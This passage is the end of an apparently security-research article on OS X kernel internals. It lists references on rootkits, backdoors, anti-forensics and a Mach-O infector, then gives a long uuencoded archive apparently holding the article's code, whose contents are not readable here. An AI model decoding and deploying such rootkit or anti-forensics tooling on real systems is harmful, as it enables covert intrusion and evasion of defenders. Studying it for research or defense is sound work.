     https://developer.apple.com/library/mac/#documentation/Darwin/Conceptual/NKEConceptual/intro/intro.html#//apple_ref/doc/uid/TP40001858-CH225-DontLinkElementID_70

[18] Apple, tcplognke
     http://developer.apple.com/library/mac/#/legacy/mac/library/samplecode/tcplognke/Introduction/Intro.html

[19] Gil Dabah, diStorm - Powerful Disassembler Library For x86/AMD64
     http://code.google.com/p/distorm/

[20] McKusick et al, The Design and Implementation of the 4.4BSD Oper.
     System, Addison Wesley, 1996, ISBN: 0-201-54979-4

[21] fG!, Av-monster: the monster that loves yummy OS X anti-virus software
     http://reverse.put.as/2012/02/13/av-monster-the-monster-that-loves-yummy-os-x-anti-virus-software/

[22] Apple, Technical Note TN2127
     https://developer.apple.com/library/mac/#technotes/tn2127/_index.html

[23] Cantrill et al, Dynamic Instrumentation of Production Systems
     dtrace_usenix.pdf

[24] Oracle, Solaris Dynamic Tracing Guide
     https://wikis.oracle.com/display/DTrace/Documentation

[25] fG!, Abusing OS X TrustedBSD framework to install r00t backdoors...
     http://reverse.put.as/2011/09/18/abusing-os-x-trustedbsd-framework-to-install-r00t-backdoors/

[26] Andrew Case, Mac Memory Analysis with Volatility
     http://reverse.put.as/wp-content/uploads/2011/06/sas-summit-mac-memory-analysis-with-volatility.pdf

[27] FreeBSD, FreeBSD Handbook
     http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/audit-config.html

[28] Der Flounder, OpenBSM auditing on Mac OS X
     http://derflounder.wordpress.com/2012/01/30/openbsm-auditing-on-mac-os-x/

[29] OpenBSM Source Code
     http://www.opensource.apple.com/source/OpenBSM/

[30] Apple, Kernel Programming guide
     https://developer.apple.com/library/mac/#documentation/Darwin/Conceptual/KernelProgramming/vm/vm.html#//apple_ref/doc/uid/TP30000905-CH210-BEHJDFCA

[31] Halvorsen, Ole Henry & Clarke, Douglas, OS X and iOS Kernel
     Programming, Apress, 2011, ISBN-10: 1430235365

[32] Hoglund, Greg & Butler, Jamie, Rootkits: Subverting the Windows
     Kernel, Addison-Wesley, 2005, ISBN-10: 0321294319

[33] Luka Milkovic, Defeating Windows memory forensics, 29C3
     http://events.ccc.de/congress/2012/Fahrplan/events/5301.en.html

[34] fG!, OS.X/Boubou  Mach-O infector PoC source code
     http://reverse.put.as/2013/03/05/os-xboubou-mach-o-infector-poc-source-code/

[35] thegrugq, How the Leopard hides his spots
     http://reverse.put.as/wp-content/uploads/2011/06/D1T2-The-Grugq-How-the-Leopard-Hides-His-Spots.pdf

--[ 10 - T3h l337 c0d3z

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
